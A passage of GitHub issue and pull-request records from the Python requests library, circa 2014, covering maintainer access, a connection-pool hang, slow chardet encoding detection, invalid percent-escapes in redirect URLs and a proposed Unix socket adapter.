[ "What about ci.kennethreitz.org\n", "@kevinburke hmm, i suppose so . \n", "Op on the IRC channel as well\n", "@kevinburke if someone tells me what command to type in, i'll do it lol\n", "I'm not sure we need op on the channel. I've never seen any problems arise in there. \n\n```\n/msg ChanServ FLAGS #python-requests lukasa +voAti\n/msg ChanServ FLAGS #python-requests sigmavirus24 +voAti\n```\n\nShould allow @Lukasa and I to OP ourselves with ChanServ when necessary. Ideally not having OP on by default will be a positive impact on the channel's atmosphere \n", "@sigmavirus24 now has access to dnsimple. @Lukasa, can you tell me your dnsimple email address? \n", "Just sent you an invite anyway — hopefully it works :)\n", "\"lukasa is not registered.\"\n\nsigma is good. \n", "@kennethreitz Sorry, used a different one: [email protected].\n\nAlways best to have 8 million email addresses.\n", "cool, i'll say this is done now. \n", "CI is still something to think about...\n", "Yeah. I'm curious why that's no longer building PRs or anything. If you want, I can set up ci.sigmavir.us to do CI here for now, but I'll need access to settings (or will need to sync up with @Lukasa about adding it)\n" ]
https://api.github.com/repos/psf/requests/issues/2361
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2361/labels{/name}
https://api.github.com/repos/psf/requests/issues/2361/comments
https://api.github.com/repos/psf/requests/issues/2361/events
https://github.com/psf/requests/issues/2361
50,513,357
MDU6SXNzdWU1MDUxMzM1Nw==
2,361
Combining pool_block == True with head blocks
{ "avatar_url": "https://avatars.githubusercontent.com/u/5834577?v=4", "events_url": "https://api.github.com/users/ARF1/events{/privacy}", "followers_url": "https://api.github.com/users/ARF1/followers", "following_url": "https://api.github.com/users/ARF1/following{/other_user}", "gists_url": "https://api.github.com/users/ARF1/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/ARF1", "id": 5834577, "login": "ARF1", "node_id": "MDQ6VXNlcjU4MzQ1Nzc=", "organizations_url": "https://api.github.com/users/ARF1/orgs", "received_events_url": "https://api.github.com/users/ARF1/received_events", "repos_url": "https://api.github.com/users/ARF1/repos", "site_admin": false, "starred_url": "https://api.github.com/users/ARF1/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/ARF1/subscriptions", "type": "User", "url": "https://api.github.com/users/ARF1", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-12-01T11:23:57Z
2021-09-08T23:05:46Z
2015-04-07T14:10:08Z
NONE
resolved
I am using requests to read redirection targets from 302 responses for a list of urls. The core function is: ``` def getRedirect(url): print('requesting: %s' % url) request = reqsSess.head(url) print('done: %s' % url) request.raise_for_status() location = request.headers['location'] request.close() return location ``` To avoid I/O lock, I am using gevent to spawn a separate `getRedirect` for all urls in my list (about 1000) and wanted to use requests' adapter rate limiting. Here I limited to one connection for testing purposes, but obviously the idea was to raise this once confirmed the it works. (Note, raising to 2 makes no difference to the issue.) ``` import requests connection_limit = 1 adapter = requests.adapters.HTTPAdapter(pool_connections=connection_limit, max_retries=3, pool_block=True) reqsSess = requests.session() reqsSess.mount('http://www.mydomain.com', adapter) ``` The problem is, that I only see "requesting: url1", etc only eight times. Then the script blocks. Am I doing something wrong? I thought this might be related to #1967 but adding `request.close()` did not help.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2361/reactions" }
https://api.github.com/repos/psf/requests/issues/2361/timeline
null
completed
null
null
false
[ "Additional observations:\n\nWith `connection_limit = 1` and `pool_block=True`, about 6-8 (changing) `requesting: url...` statements are printed. Wireshark shows only a single DNS request and response. **No http requests of any kind are transmitted.**\n\nWith `connection_limit = 2` and `pool_block=True`, exactly 11 `requesting: url...` statements are printed. Wireshark shows only 10 DNS requests and responses. **No http requests of any kind are transmitted.**\n\nWith `connection_limit = 1` and `pool_block=False`, `requesting: url...` statements are printed interspersed with the warning that the connection pool is full. **Wireshark shows http HEAD requests are transmitted and responses received.**\n" ]
https://api.github.com/repos/psf/requests/issues/2360
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2360/labels{/name}
https://api.github.com/repos/psf/requests/issues/2360/comments
https://api.github.com/repos/psf/requests/issues/2360/events
https://github.com/psf/requests/pull/2360
50,474,384
MDExOlB1bGxSZXF1ZXN0MjUyNDEyMDM=
2,360
dummy commit
{ "avatar_url": "https://avatars.githubusercontent.com/u/234019?v=4", "events_url": "https://api.github.com/users/kevinburke/events{/privacy}", "followers_url": "https://api.github.com/users/kevinburke/followers", "following_url": "https://api.github.com/users/kevinburke/following{/other_user}", "gists_url": "https://api.github.com/users/kevinburke/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kevinburke", "id": 234019, "login": "kevinburke", "node_id": "MDQ6VXNlcjIzNDAxOQ==", "organizations_url": "https://api.github.com/users/kevinburke/orgs", "received_events_url": "https://api.github.com/users/kevinburke/received_events", "repos_url": "https://api.github.com/users/kevinburke/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kevinburke/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kevinburke/subscriptions", "type": "User", "url": "https://api.github.com/users/kevinburke", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-11-30T23:02:02Z
2021-09-08T09:01:11Z
2014-11-30T23:36:43Z
CONTRIBUTOR
resolved
testing whether ci.kennethreitz.org is working again
{ "avatar_url": "https://avatars.githubusercontent.com/u/234019?v=4", "events_url": "https://api.github.com/users/kevinburke/events{/privacy}", "followers_url": "https://api.github.com/users/kevinburke/followers", "following_url": "https://api.github.com/users/kevinburke/following{/other_user}", "gists_url": "https://api.github.com/users/kevinburke/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kevinburke", "id": 234019, "login": "kevinburke", "node_id": "MDQ6VXNlcjIzNDAxOQ==", "organizations_url": "https://api.github.com/users/kevinburke/orgs", "received_events_url": "https://api.github.com/users/kevinburke/received_events", "repos_url": "https://api.github.com/users/kevinburke/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kevinburke/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kevinburke/subscriptions", "type": "User", "url": "https://api.github.com/users/kevinburke", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2360/reactions" }
https://api.github.com/repos/psf/requests/issues/2360/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2360.diff", "html_url": "https://github.com/psf/requests/pull/2360", "merged_at": null, "patch_url": "https://github.com/psf/requests/pull/2360.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2360" }
true
[ "looks like it is!\n" ]
https://api.github.com/repos/psf/requests/issues/2359
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2359/labels{/name}
https://api.github.com/repos/psf/requests/issues/2359/comments
https://api.github.com/repos/psf/requests/issues/2359/events
https://github.com/psf/requests/issues/2359
50,243,267
MDU6SXNzdWU1MDI0MzI2Nw==
2,359
Charset detection in text() can be pathologically slow
{ "avatar_url": "https://avatars.githubusercontent.com/u/1546674?v=4", "events_url": "https://api.github.com/users/marcocova/events{/privacy}", "followers_url": "https://api.github.com/users/marcocova/followers", "following_url": "https://api.github.com/users/marcocova/following{/other_user}", "gists_url": "https://api.github.com/users/marcocova/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/marcocova", "id": 1546674, "login": "marcocova", "node_id": "MDQ6VXNlcjE1NDY2NzQ=", "organizations_url": "https://api.github.com/users/marcocova/orgs", "received_events_url": "https://api.github.com/users/marcocova/received_events", "repos_url": "https://api.github.com/users/marcocova/repos", "site_admin": false, "starred_url": "https://api.github.com/users/marcocova/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/marcocova/subscriptions", "type": "User", "url": "https://api.github.com/users/marcocova", "user_view_type": "public" }
[ { "color": "f7c6c7", "default": false, "description": null, "id": 167537670, "name": "Propose Close", "node_id": "MDU6TGFiZWwxNjc1Mzc2NzA=", "url": "https://api.github.com/repos/psf/requests/labels/Propose%20Close" } ]
closed
true
null
[]
null
10
2014-11-27T01:00:37Z
2021-09-03T00:10:52Z
2015-04-07T13:43:51Z
NONE
resolved
When calling `response.text()` and no encoding was set or determined, requests relies on `chardet` to detect the encoding: ``` python @property def apparent_encoding(self): """The apparent encoding, provided by the chardet library""" return chardet.detect(self.content)['encoding'] ``` Unfortunately, chardet can be pathologically [slow and memory-hungry](https://github.com/chardet/chardet/issues/29) to do its job. For example, processing the text property of a response with the following content: ``` "a" * (1024 * 1024) + "\xa9" ``` causes python-requests to use 131.00MB and 40+ seconds (for a 1MB response!)
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 2, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 2, "url": "https://api.github.com/repos/psf/requests/issues/2359/reactions" }
https://api.github.com/repos/psf/requests/issues/2359/timeline
null
completed
null
null
false
[ "We're aware of this. Do you have a proposal to replace it with something better?\n", "How about using <a href=https://pypi.python.org/pypi/cchardet/> cChardet </a>? \n", "We can't vendor anything that uses C extensions, so no @rsnair2 we can't use cChardet\n", "Couldn't it be the solution in @marcocova's case though? If instead of letting requests determine the charset, he could use cChardet and tell requests what charset to expect.\n", "@Terr the solution of setting the encoding manually is well documented, so I would hope that @marcocova had considered that.\n", "@sigmavirus24, yes, workarounds are well understood. I was just concerned that the default behavior leaves the user exposed to this issue (with no warnings in the docs - that I could find at least).\n", "Closing due to inactivity \n", "@marcocova I had the same issue, then i found this: https://pypi.python.org/pypi/cchardet/\nFrom 5 seconds (chardet), I got 1 milisecond :)\n", "In case others are coming here, as I did, and wondering why cchardet isn't included in requests, well, I can provide an answer just gleaned by talking to one of the maintainers on IRC. There was, [at one time](https://github.com/kennethreitz/requests/pull/814), a conditional import for cchardet, but it has since been removed. I asked why. Two reasons. First, chardet and cchardet are not fully compatible and have different strengths and accuracies. So, having a conditional import means that requests wouldn't be deterministic. This is a very bad thing. \n\nThe second reason is that conditional imports are vaguely causing trouble in other areas of requests that the devs want to trim down. I don't know the details here, exactly, but there's an import for simplejson that they say has caused trouble, so they're disinclined to do more conditional imports. \n\nSo, if you want faster processing and your comfy with the fact that cchardet has different responses to chardet, you can do this in your code just before the first time you access `r.text`:\n\n```\nif r.encoding is None:\n # Requests detects the encoding when the item is GET'ed using\n # HTTP headers, and then when r.text is accessed, if the encoding\n # hasn't been set by that point. By setting the encoding here, we\n # ensure that it's done by cchardet, if it hasn't been done with\n # HTTP headers. This way it is done before r.text is accessed\n # (which would do it with vanilla chardet). This is a big\n # performance boon.\n r.encoding = cchardet.detect(r.content)['encoding']\n```\n", "Following up on @sigmavirus24 and @mlissner comments (advising to set `r.encoding` by yourself before any call to `.text` is done)\r\n\r\nNote that if the payload is binary (e.g. download a .gz file from S3), `cchardet` will quickly return an encoding of `None`.\r\nBut setting `r.encoding = None` is a no-op, so you still have to refrain from calling `.text` or `.apparent_encoding` afterwards, or these would trigger a new, slow, `chardet` detection\r\n\r\nI took the path of... monkey-patching `apparent_encoding`... ¯\\_(ツ)_/¯ \r\nThe following seems to be working (Python 3.7, Requests 2.22.0, YMMV)\r\n\r\n```\r\nimport requests\r\nimport cchardet\r\n\r\nclass ForceCchardet:\r\n @property\r\n def apparent_encoding(obj):\r\n return cchardet.detect(obj.content)['encoding']\r\nrequests.Response.apparent_encoding = ForceCchardet.apparent_encoding\r\n```" ]
https://api.github.com/repos/psf/requests/issues/2358
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2358/labels{/name}
https://api.github.com/repos/psf/requests/issues/2358/comments
https://api.github.com/repos/psf/requests/issues/2358/events
https://github.com/psf/requests/issues/2358
50,116,861
MDU6SXNzdWU1MDExNjg2MQ==
2,358
about GET request
{ "avatar_url": "https://avatars.githubusercontent.com/u/1115526?v=4", "events_url": "https://api.github.com/users/snowleung/events{/privacy}", "followers_url": "https://api.github.com/users/snowleung/followers", "following_url": "https://api.github.com/users/snowleung/following{/other_user}", "gists_url": "https://api.github.com/users/snowleung/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/snowleung", "id": 1115526, "login": "snowleung", "node_id": "MDQ6VXNlcjExMTU1MjY=", "organizations_url": "https://api.github.com/users/snowleung/orgs", "received_events_url": "https://api.github.com/users/snowleung/received_events", "repos_url": "https://api.github.com/users/snowleung/repos", "site_admin": false, "starred_url": "https://api.github.com/users/snowleung/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/snowleung/subscriptions", "type": "User", "url": "https://api.github.com/users/snowleung", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2014-11-26T04:22:25Z
2021-09-08T23:06:55Z
2014-11-26T04:30:33Z
NONE
resolved
In requests, GET request need "params = request_body", but POST (or ohter) request need "data=request_body", so i think about is let the request data together. i know HTTP BODY and URL params need a different handler, but we can let this handler in send_request function (means use URL or BODY). and it's there any "design pattern" about using "params" and "data" ? thx. file: api.py line: 23-24
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2358/reactions" }
https://api.github.com/repos/psf/requests/issues/2358/timeline
null
completed
null
null
false
[ "Nothing prevents you from using both `params` and `data` simultaneously. I'm not sure I understand what you're asking. Regardless, it seems as though you're asking a question and this is not a forum it is an issue tracker. Questions belong on [StackOverflow](https://stackoverflow.com/questions/tagged/python-requests).\n", "sorry for my english. but i gotcha.\nI just forget POST can upload file (bytes) also.\n thx.\n" ]
https://api.github.com/repos/psf/requests/issues/2357
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2357/labels{/name}
https://api.github.com/repos/psf/requests/issues/2357/comments
https://api.github.com/repos/psf/requests/issues/2357/events
https://github.com/psf/requests/pull/2357
50,109,917
MDExOlB1bGxSZXF1ZXN0MjUwNTY1Mzg=
2,357
work around for dealing with a multipart/related multipart upload instea...
{ "avatar_url": "https://avatars.githubusercontent.com/u/64289?v=4", "events_url": "https://api.github.com/users/netjunki/events{/privacy}", "followers_url": "https://api.github.com/users/netjunki/followers", "following_url": "https://api.github.com/users/netjunki/following{/other_user}", "gists_url": "https://api.github.com/users/netjunki/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/netjunki", "id": 64289, "login": "netjunki", "node_id": "MDQ6VXNlcjY0Mjg5", "organizations_url": "https://api.github.com/users/netjunki/orgs", "received_events_url": "https://api.github.com/users/netjunki/received_events", "repos_url": "https://api.github.com/users/netjunki/repos", "site_admin": false, "starred_url": "https://api.github.com/users/netjunki/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/netjunki/subscriptions", "type": "User", "url": "https://api.github.com/users/netjunki", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-11-26T02:13:25Z
2021-09-08T09:01:13Z
2014-11-26T02:23:35Z
NONE
resolved
...d of a multipart/form-data. Was trying to integrate file upload support for the HipChat v2 API with will and discovered that requests can't deal with the type of multipart request their upload api requires. https://www.hipchat.com/docs/apiv2/method/share_file_with_room I think this approach is a complete mess... but not sure about the best way to go about dealing with it.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2357/reactions" }
https://api.github.com/repos/psf/requests/issues/2357/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2357.diff", "html_url": "https://github.com/psf/requests/pull/2357", "merged_at": null, "patch_url": "https://github.com/psf/requests/pull/2357.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2357" }
true
[ "Hey @netjunki,\n\nWe're not expanding the API any longer. Requests is under a feature freeze unless Kenneth blesses it for inclusion (which is rare and highly unlikely). You could probably subclass the `MultipartEncoder` from the requests-toolbelt and achieve what you're looking for here pretty easily.\n\nThanks for the pull request\n" ]
https://api.github.com/repos/psf/requests/issues/2356
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2356/labels{/name}
https://api.github.com/repos/psf/requests/issues/2356/comments
https://api.github.com/repos/psf/requests/issues/2356/events
https://github.com/psf/requests/issues/2356
50,071,109
MDU6SXNzdWU1MDA3MTEwOQ==
2,356
Requests unable to follow/retrieve links with percent in url
{ "avatar_url": "https://avatars.githubusercontent.com/u/1652853?v=4", "events_url": "https://api.github.com/users/suhaasprasad/events{/privacy}", "followers_url": "https://api.github.com/users/suhaasprasad/followers", "following_url": "https://api.github.com/users/suhaasprasad/following{/other_user}", "gists_url": "https://api.github.com/users/suhaasprasad/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/suhaasprasad", "id": 1652853, "login": "suhaasprasad", "node_id": "MDQ6VXNlcjE2NTI4NTM=", "organizations_url": "https://api.github.com/users/suhaasprasad/orgs", "received_events_url": "https://api.github.com/users/suhaasprasad/received_events", "repos_url": "https://api.github.com/users/suhaasprasad/repos", "site_admin": false, "starred_url": "https://api.github.com/users/suhaasprasad/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/suhaasprasad/subscriptions", "type": "User", "url": "https://api.github.com/users/suhaasprasad", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2014-11-25T19:15:39Z
2021-09-08T23:06:02Z
2015-01-27T18:24:34Z
NONE
resolved
A simple requests.get(url) doesn't work for the following: http://bit.ly/1x5vKWM http://bit.ly/1yPgqvg http://style.shoedazzle.com/dmg/3AE3B8?dzcode=FBT&dzcontent=FBT_SDZ_CPM_Q414&pid=112768085&aid=285880402&cid=0&publisher=%ppublisher=!;&placement=%pplacement=!;
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2356/reactions" }
https://api.github.com/repos/psf/requests/issues/2356/timeline
null
completed
null
null
false
[ "This bug is exactly the same as #1360, with one key difference: here, the server isn't percent-encoding percent signs. This is not valid HTTP, and we're totally allowed to fail here according to RFC 7231:\n\n> Note: Some recipients attempt to recover from Location fields that are not valid URI references. This specification does not mandate or define such processing, but does allow it for the sake of robustness.\n\nHowever, I wonder if we can do better. Specifically, I wonder if we can update our `requote_uri` function to allow us to attempt to unquote it, and if that fails because of invalid percent-escape sequences we can just use the URL unchanged. That probably covers most of our bases, and it's gotta be better than failing hard like we do now.\n\n@sigmavirus24, thoughts?\n", "I'm +0 on the idea but my opinion really depends on the complexity of the fix.\n", "So, looking at this again, I did tried the following:\n\n``` py\n>>> import requests\n>>> r = requests.get('http://bit.ly/1x5vKWM', allow_redirects=False)\n>>> r\n<Response [301]>\n>>> r.headers['Location']\n'http://ad.doubleclick.net/ddm/clk/285880402;112768085;k'\n>>> r2 = requests.get(r.headers['Location'], allow_redirects=False)\n>>> r2\n<Response [302]>\n>>> r2.headers['Location']\n'http://style.shoedazzle.com/dmg/3AE3B8?dzcode=FBT&dzcontent=FBT_SDZ_CPM_Q414&pid=112768085&aid=285880402&cid=0&publisher=%ppublisher=!;&placement=%pplacement=!;'\n>>> r3 = requests.get(r2.headers['Location'], allow_redirects=False)\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\n File \".../virtualenv/twine/lib/python2.7/site-packages/requests/api.py\", line 65, in get\n return request('get', url, **kwargs)\n File \".../virtualenv/twine/lib/python2.7/site-packages/requests/api.py\", line 49, in request\n response = session.request(method=method, url=url, **kwargs)\n File \".../virtualenv/twine/lib/python2.7/site-packages/requests/sessions.py\", line 447, in request\n prep = self.prepare_request(req)\n File \".../virtualenv/twine/lib/python2.7/site-packages/requests/sessions.py\", line 378, in prepare_request\n hooks=merge_hooks(request.hooks, self.hooks),\n File \".../virtualenv/twine/lib/python2.7/site-packages/requests/models.py\", line 304, in prepare\n self.prepare_url(url, params)\n File \".../virtualenv/twine/lib/python2.7/site-packages/requests/models.py\", line 400, in prepare_url\n url = requote_uri(urlunparse([scheme, netloc, path, None, query, fragment]))\n File \".../virtualenv/twine/lib/python2.7/site-packages/requests/utils.py\", line 424, in requote_uri\n return quote(unquote_unreserved(uri), safe=\"!#$%&'()*+,/:;=?@[]~\")\n File \".../virtualenv/twine/lib/python2.7/site-packages/requests/utils.py\", line 404, in unquote_unreserved\n raise InvalidURL(\"Invalid percent-escape sequence: '%s'\" % h)\nrequests.exceptions.InvalidURL: Invalid percent-escape sequence: 'pp'\n```\n\nI assume this is something along the lines of what @suhaasprasad is seeing. I'm going to see if following @Lukasa's idea will work for this.\n" ]
https://api.github.com/repos/psf/requests/issues/2355
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2355/labels{/name}
https://api.github.com/repos/psf/requests/issues/2355/comments
https://api.github.com/repos/psf/requests/issues/2355/events
https://github.com/psf/requests/pull/2355
49,961,012
MDExOlB1bGxSZXF1ZXN0MjQ5NzU1NTc=
2,355
Unix domain sockets
{ "avatar_url": "https://avatars.githubusercontent.com/u/305268?v=4", "events_url": "https://api.github.com/users/msabramo/events{/privacy}", "followers_url": "https://api.github.com/users/msabramo/followers", "following_url": "https://api.github.com/users/msabramo/following{/other_user}", "gists_url": "https://api.github.com/users/msabramo/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/msabramo", "id": 305268, "login": "msabramo", "node_id": "MDQ6VXNlcjMwNTI2OA==", "organizations_url": "https://api.github.com/users/msabramo/orgs", "received_events_url": "https://api.github.com/users/msabramo/received_events", "repos_url": "https://api.github.com/users/msabramo/repos", "site_admin": false, "starred_url": "https://api.github.com/users/msabramo/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/msabramo/subscriptions", "type": "User", "url": "https://api.github.com/users/msabramo", "user_view_type": "public" }
[]
closed
true
null
[]
null
4
2014-11-25T00:18:28Z
2021-09-08T09:01:14Z
2014-11-25T02:09:42Z
CONTRIBUTOR
resolved
This adds support for unix domain sockets by using a slightly modified version of the unix domain socket adapter from the [docker-py](https://github.com/docker/docker-py) project: https://github.com/docker/docker-py/blob/master/docker/unixconn/unixconn.py The modifications are to make the adapter more usable in a greater variety of contexts by getting rid of the context of a `base_url` for the adapter and inventing a URL syntax that allows embedding the socket path into the URL. Basically the socket name goes in the netloc (host) part of the URL, but it's URL-encoded so that slashes become `%2F`'s so that the slashes don't interfere with separating the netloc and path parts of the URLs. This was roughly inspired by URL syntaxes that are mentioned in the following comments: - http://daniel.haxx.se/blog/2008/04/14/http-over-unix-domain-sockets/ - http://lists.w3.org/Archives/Public/uri/2008Oct/0000.html So for example if I had a server listening on `/tmp/profilesvc.sock`: ``` $ gunicorn --paste development.ini --log-config development.ini --bind unix:/tmp/profilesvc.sock ... 2014-11-24 16:14:54,943 INFO [MainThread][gunicorn.error.info][glogging.py +213] Listening at: unix:/tmp/profilesvc.sock (95775) ... ``` I can access it as follows: ``` python import requests resp = requests.get('http+unix://%2Ftmp%2Fprofilesvc.sock/status/pid') ``` In case you're curious about the motivation for adding unix domain socket support, it was inspired by: https://github.com/jakubroztocil/httpie/issues/209 Cc: @shin-, @jakubroztocil, @monsanto, @np, @nuxlli, @matrixise, @remmelt
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2355/reactions" }
https://api.github.com/repos/psf/requests/issues/2355/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2355.diff", "html_url": "https://github.com/psf/requests/pull/2355", "merged_at": null, "patch_url": "https://github.com/psf/requests/pull/2355.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2355" }
true
[ "Probably if `requests` had this, docker-py and other projects might be able to make use of it and not have to maintain their own versions. I wonder if @shin- could use this in docker-py.\n", "Very nice @msabramo \n", "So the fundamental thing to remember about requests is that it is an HTTP library which means we strive to be in compliance with RFC 7230, 7231, 7232, 7233, 7234, and 7235 and other RFCs that relate to how we have to transmit the data or communicate with the server (etc. etc. etc.). We primarily handle HTTP, we don't handle arbitrary URLs. That's a job for a library that will handle arbitrary URLs. (Hint: this was the point of urllib/urllib2)\n\nNote, while people use requests for `unix://` or `file://`, we do not explicitly support these protocols purposefully. Our scope is very narrowly defined to 98% of our users concerns: HTTP. Those protocols are currently used through transport adapters and the adapters that provide this functionality are packaged separately.\n\nIf copying and pasting this code around is becoming a problem for projects (like httpie, docker-py, or whomever else) the solution is not to upstream the code here to be maintained by 